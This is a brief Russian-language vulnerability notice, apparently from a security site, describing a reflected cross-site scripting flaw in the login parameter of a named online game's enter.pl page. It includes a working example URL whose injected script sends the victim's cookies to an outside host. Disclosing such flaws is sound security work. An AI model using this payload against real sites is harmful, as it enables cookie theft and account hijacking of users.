Удаленный атакующий может сконструировать специальную ссылку, содержащую произвольный код сценария, при клике на которую код будет выполнен в браузере пользователя, кликнувшего на эту ссылку. Уязвимость может использоваться для перехвата куки или организации Web-based нападений. 

Пример: 

http://demonscity.combats.ru/enter.pl?login= <Script>location%3d'http://my.site.ru/get.php?board%3d'%2b
(document.cookie)%3b</Script>&psw=222

Нашёл: [Jaguar] MaZaFaKa.Ru Team

Оставить мнение